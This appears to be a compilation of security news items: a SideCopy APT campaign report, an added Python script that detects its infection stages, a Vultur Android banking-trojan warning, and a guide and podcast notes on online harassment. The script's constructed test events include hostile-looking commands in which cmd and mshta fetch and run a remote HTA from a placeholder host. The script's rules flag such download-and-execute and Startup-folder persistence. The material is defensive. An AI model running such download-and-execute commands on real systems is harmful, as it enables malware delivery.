SideCopy APT Campaign Found Targeting Indian Universities
Technical Analysis of the SideCopy Campaign Infection Chain
In early May, Cyble Research and Intelligence Labs (CRIL) identified a malicious domain employed by the SideCopy group in its operations. The website was found hosting a ZIP archive named "files.zip" that contained sub-directories labeled "economy," "it," and "survey." The survey directory included files similar to those SideCopy had employed in earlier campaigns.

The campaign likely uses spam emails to distribute the malicious ZIP archive hosted on the compromised website as the initial infection vector. The archives contain malicious LNK files disguised as legitimate documents, such as "IT Trends.docx.lnk." When opened, the LNK file triggers a series of commands that download and execute a malicious HTA file. The downloaded HTA files carry embedded payloads, including additional lure documents and DLL files. The lure documents are typically themed around current affairs or relevant academic topics so that they look legitimate to the targeted demographic.

The malware is built to adapt to the presence of antivirus products such as Avast, Kaspersky and Bitdefender, which improves its chances of evading detection, and it establishes persistence by placing LNK shortcut files in the Startup folder. The attack chain ultimately deploys payloads such as Reverse RAT and Action RAT onto the victim system, which then connect to a remote command-and-control (C&C) server to begin malicious activity.

Intersection with Transparent Tribe Activities
The research further suggests a potential overlap or collaboration between SideCopy and Transparent Tribe, another APT group known for targeting Indian military and academic institutions. This intersection hints at a collaborative effort or shared objectives between the two groups; researchers have previously noted that SideCopy may function as a sub-division of Transparent Tribe. SideCopy is also known to emulate the tactics of the SideWinder APT group in distributing malware, such as the use of disguised LNK files to initiate a multi-stage infection chain.

CRIL researchers advise strong email filtering, user caution, network-level monitoring, and disabling or restricting script hosts such as PowerShell, mshta.exe and cmd.exe where they are not needed, in order to defend against this threat.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
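The infection chain described in the SideCopy analysis above has three stages that leave traces in ordinary endpoint telemetry: a script host launched from the desktop shell (which is how a double-clicked LNK runs), mshta.exe fetching an HTA over HTTP(S), and a .lnk file written to a Startup folder. As an added example, not code from the Cyble/CRIL report or from The Cyber Express, the rule set below runs over constructed Sysmon-style process-creation (EventID 1) and file-creation (EventID 11) events and flags each of those stages. The events, user name, paths and the example.invalid host are made up for the demonstration.

```python
import re
from typing import Dict, List, Optional

# Constructed Sysmon-style events (hypothetical; not taken from the campaign or the Cyble report).
# EventID 1 = process creation, EventID 11 = file creation. Hosts and paths are placeholders.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "mshta.exe https://example.invalid/files/it/update.hta"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"mshta.exe C:\Windows\System32\setup.hta"},   # local HTA, no URL: not flagged here
    {"EventID": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\student\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IT Trends.docx.lnk"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'cmd.exe /c start /min mshta "https://example.invalid/files/survey/s.hta"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" C:\Users\student\Desktop\notes.txt'},
    {"EventID": 11, "Image": r"C:\Windows\System32\notepad.exe",
     "TargetFilename": r"C:\Users\student\Desktop\notes.txt"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
STARTUP_DIR = "\\start menu\\programs\\startup\\"   # matched case-insensitively against lowered paths
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    """Last path component, lower-cased, so rules are not fooled by casing or directory."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict) -> Optional[str]:
    """Return the name of the first matching rule, or None if the event is uninteresting."""
    if event["EventID"] == 1:
        image = basename(event["Image"])
        parent = basename(event.get("ParentImage", ""))
        cmdline = event.get("CommandLine", "")
        # Rule 1: mshta.exe told to fetch an HTA over HTTP(S): the download-and-execute stage.
        if image == "mshta.exe" and URL_RE.search(cmdline):
            return "remote_hta_via_mshta"
        # Rule 2: a script host spawned by the desktop shell (a double-clicked LNK) with a URL
        # on its command line: the LNK-triggered command stage.
        if parent == "explorer.exe" and image in SCRIPT_HOSTS and URL_RE.search(cmdline):
            return "script_host_from_explorer_with_url"
    elif event["EventID"] == 11:
        target = event["TargetFilename"].lower()
        # Rule 3: a shortcut dropped into a Startup folder: the persistence stage.
        if target.endswith(".lnk") and STARTUP_DIR in target:
            return "lnk_in_startup_folder"
    return None


def detect(events: List[Dict]) -> List[Dict]:
    """Run every rule over every event and return the findings in event order."""
    findings = []
    for index, event in enumerate(events):
        rule = classify(event)
        if rule:
            detail = event.get("CommandLine") or event.get("TargetFilename")
            findings.append({"index": index, "rule": rule, "detail": detail})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(f"event {finding['index']}: {finding['rule']}: {finding['detail']}")
```

The second sample event (mshta.exe opening a local HTA) is deliberately left unflagged: it shows that a URL-only rule misses the case where the HTA has already been written to disk, so in production you would pair Rule 1 with a rule on HTA files executed from user-writable directories.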
Finland Warns of New Android Malware that Siphons Money from your Bank
Vultur Android Malware Campaign Trademarks
While Finnish authorities have not definitively identified the malware involved or shared hashes or identifiers for the APK files, the attacks bear a striking resemblance to those reported by Fox-IT analysts in connection with a new version of the Vultur trojan.

(Figure: Vultur trojan infection chain; credit: Fox-IT)

The new iteration of Vultur combines smishing with follow-up phone calls to persuade targets into installing a fake McAfee Security app. That app delivers the final payload in three separate parts to evade detection. Notable features of this version include extensive file-management operations, abuse of Accessibility Services, app blocking, disabling the Keyguard, and serving custom notifications in the status bar.

Things to Do If You Suspect You Are a Victim
If you suspect that your device has been infected with the malware, contact your bank immediately so that it can enable protective measures. Restoring factory settings on the infected Android device, which wipes all data and apps, is also recommended. OP Financial Group emphasizes that it does not ask customers to share sensitive data over the phone or to install apps in order to receive or cancel payments. “We will never send you messages with a link to the online bank login page. The bank also never asks you for your ID or card information via messages. Such messages are scams and you should not click on the links in them,” the OP Financial Group said. “Even in order to receive or cancel a payment, you do not need to log in from a link, confirm with codes or provide your information. If you are asked to do this, contact the bank's customer service.” Any similar requests should also be promptly reported to the police.

The news of the online banking fraud comes days after a multinational police operation cracked open a large fraudulent call-center network across Europe that targeted senior citizens in particular, with the aim of defrauding them of thousands of dollars. The crackdown, dubbed Operation Pandora, began when a vigilant bank teller in Freiburg, Germany, alerted law enforcement to a 76-year-old customer attempting to withdraw a large sum of money. Scammers posed as relatives, bank employees or police officers to deceive victims into surrendering their savings. The operation revealed call centers operating in different countries, each specializing in a different type of telephone fraud, from investment scams to debt-collection demands.

How to protect yourself from online harassment
It takes a little to receive a lot of online hate today, from simply working as a school administrator to playing a role in a popular movie or video game.
But these moments of personal crisis have few immediate solutions, as the current proposals to curb online harassment zero in on the systemic, such as changes in data privacy laws to limit the personal information that can be weaponized online, or calls for major social media platforms to better moderate hateful content and its spread.
Such structural shifts can take years (if they take place at all), which can leave today’s victims feeling helpless.
There are, however, a few steps that everyday people can take, starting now, to better protect themselves against online hate and harassment campaigns. And thankfully, none of them involve “just getting off the internet,” a suggestion that, according to Leigh Honeywell, is both ineffective and unwanted.
“The [idea that the] answer to being bullied is that you shouldn’t be able to participate in public life—I don’t think that’s okay,” said Honeywell, CEO and co-founder of the digital safety consultancy Tall Poppy.
Speaking to me on the Lock and Code podcast last month, Honeywell explained that Tall Poppy’s defense strategies to online harassment incorporate best practices from Honeywell’s prior industry—cybersecurity.
Here are a few steps that people can proactively take to limit online harassment before it happens.
Get good at Googling yourself
One of the first steps in protecting yourself from online harassment is finding out what information about you is already available online. This is because, as Honeywell said, much of that information can be weaponized for abuse.
Picture an angry diner posting a chef’s address on Yelp alongside a poor review, or a complete stranger sending in a fake bomb threat to a school address, or a real-life bully scraping the internet for embarrassing photos of someone they want to harass.
All this information could be available online, and the best way to know if it exists is to do the searching yourself.
As for where to start?
“First name, last name, city name, or other characteristics about yourself,” Honeywell said, listing what, specifically, to search online.
The search itself may not turn up everything at once, but it will likely reveal active online profiles on platforms like LinkedIn, X (formerly Twitter), Facebook, and Instagram. If those profiles are public, an angry individual could scrape relevant information and use it against you. Even a LinkedIn profile can be weaponized by someone who calls in fake complaints to a person’s employer in an attempt to get them fired.
In combing through the data that you can find about yourself online, Honeywell said people should focus on what someone else could do with that data.
“If an adversary was trying to find out information about me, what would they find?” Honeywell said. “If they had that information, what would they do with it?”
Take down what you can
You’ve found what an adversary might use against you online. Now it’s time to take it down.
Admittedly, this can be difficult in the United States, as Americans are not protected by a national data privacy law that gives them the right to request their data be deleted from certain websites, platforms, and data brokers.
Where Americans could find some help, however, is from online resources and services that streamline the data removal process enshrined in some state laws. These tools, like the iOS app Permission Slip, released by Consumer Reports in 2022, show users what types of information companies are collecting about them and give users the opportunity to request that such data be deleted.
Separately, in 2023 Google released an online tool, called “Results about you,” through which users can request that certain search results containing their personal information be removed.
When all else fails, Honeywell said that people shouldn’t be afraid to escalate the situation to their state’s regulators. That could include filing an official complaint with a State Attorney General, or with the Consumer Financial Protection Bureau, or the Federal Trade Commission.
“It sounds like the big guns,” Honeywell said, “but I think it’s important that, as individuals, we do what we can to hold the companies that are creating this mess accountable.”
Lock down your accounts
If an adversary can’t find your information through an online search, they may try to steal that information by hacking into your accounts, Honeywell said.
“If I’m mad at David, I’m going to hack into David’s email and share personal information,” Honeywell said. “That’s a fairly standard way that we see some of the worst online harassment attacks escalate.”
While hackers may have plenty of novel tools at their disposal, the best defenses you can implement today are the use of unique passwords and multifactor authentication.
Let’s first talk about unique passwords.
Each and every single one of your online accounts—from your email, to your social media profiles, to your online banking—should have a strong, unique password. And because you likely have dozens upon dozens of online accounts to manage, you should keep track of all those passwords with a devoted password manager.
Using unique passwords is one of the best defenses against company data breaches that expose user login credentials. Once those credentials circulate on the dark web, attackers buy them and try them against other services, a technique known as credential stuffing, on the bet that people reuse passwords. You can defeat those attempts going forward by never repeating a password across any of your online accounts.
Now, start using multifactor authentication, if you’re not already.
Multifactor authentication is offered by most major companies and services today, from your bank, to your email, to your medical provider. With multifactor authentication, also called MFA or 2FA, you must “authenticate” yourself with more than just your password: after entering your username and password on a site or app, you are also prompted for a second factor, typically a one-time code generated by an authenticator app, a code sent to your phone by text message, or a tap on a hardware security key. Where the service offers a choice, prefer an authenticator app or a hardware key over text-message codes, which can be intercepted by an attacker who takes over your phone number.
MFA is one of the strongest protections against password abuse: even if a hacker has your username and password, they still can’t get into your account without the additional factor needed to complete the login. Bear in mind that a code you type can still be phished if you enter it on a fake login page, so be as careful about where you enter the code as about where you enter the password.
In the world of cybersecurity, these two defense practices are among the gold standard in stopping cyberattacks. In the world of online harassment, they’re much the same—they work to prevent the abuse of your online accounts.
Here to help
Online harassment is an isolating experience, but protecting yourself against it can be quite the opposite. Honeywell suggested that, for those who feel overwhelmed or who do not know where to start, they can find a friend to help.
“Buddy up,” Honeywell said. “If you’ve got a friend who’s good at Googling, work on each other’s profile, identify what information is out there about you.”
Honeywell also recommended going through data takedown requests together, as the processes can be “extremely tedious” and some of the services that promise to remove your information from the internet are really only trying to sell you a service.
If you’re still wondering what information about you is online and you aren’t comfortable with your way around Google, Malwarebytes has a new, free tool that reveals what information of yours is available on the dark web and across the internet at large. The Digital Footprint Portal, released in April, provides free, unlimited scans for everyone, and it can serve as a strong first step in understanding what information of yours needs to be locked down.
Going viral shouldn’t lead to bomb threats, with Leigh Honeywell: Lock and Code S05E06
This week on the Lock and Code podcast…
A disappointing meal at a restaurant. An ugly breakup between two partners. A popular TV show that kills off a beloved, main character.
In a perfect world, these are irritations and moments of vulnerability. But online today, these same events can sometimes be the catalyst for hate. That disappointing meal can produce a frighteningly invasive Yelp review that exposes a restaurant owner’s home address for all to see. That ugly breakup can lead to an abusive ex posting a video of revenge porn. And even a movie or videogame can enrage some individuals into such a fury that they begin sending death threats to the actors and cast mates involved.
Online hate and harassment campaigns are well-known and widely studied. Sadly, they’re also becoming more frequent.
In 2023, the Anti-Defamation League revealed that 52% of American adults reported being harassed online at least some time in their life—the highest rate ever recorded by the organization and a dramatic climb from the 40% who responded similarly just one year earlier. When asking teens about recent harm, 51% said they’d suffered from online harassment in strictly the 12 months prior to taking the survey itself—a radical 15% increase from what teens said the year prior.
The proposed solutions, so far, have been difficult to implement.
Social media platforms often deflect blame—and are frequently shielded from legal liability—and many efforts to moderate and remove hateful content have either been slow or entirely absent in the past. Popular accounts with millions of followers will, without explicitly inciting violence, sometimes draw undue attention to everyday people. And the increasing need to have an online presence for teens—even classwork is done online now—makes it near impossible to simply “log off.”
Today, on the Lock and Code podcast with host David Ruiz, we speak with Tall Poppy CEO and co-founder Leigh Honeywell, about the evolution of online hate, personal defense strategies that mirror many of the best practices in cybersecurity, and the modern risks of accidentally becoming viral in a world with little privacy.
“It’s not just that your content can go viral, it’s that when your content goes viral, five people might be motivated enough to call in a fake bomb threat at your house.”
Leigh Honeywell, CEO and co-founder of Tall Poppy
Tune in today to listen to the full conversation.
Show notes and credits:
Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)
Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.
Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.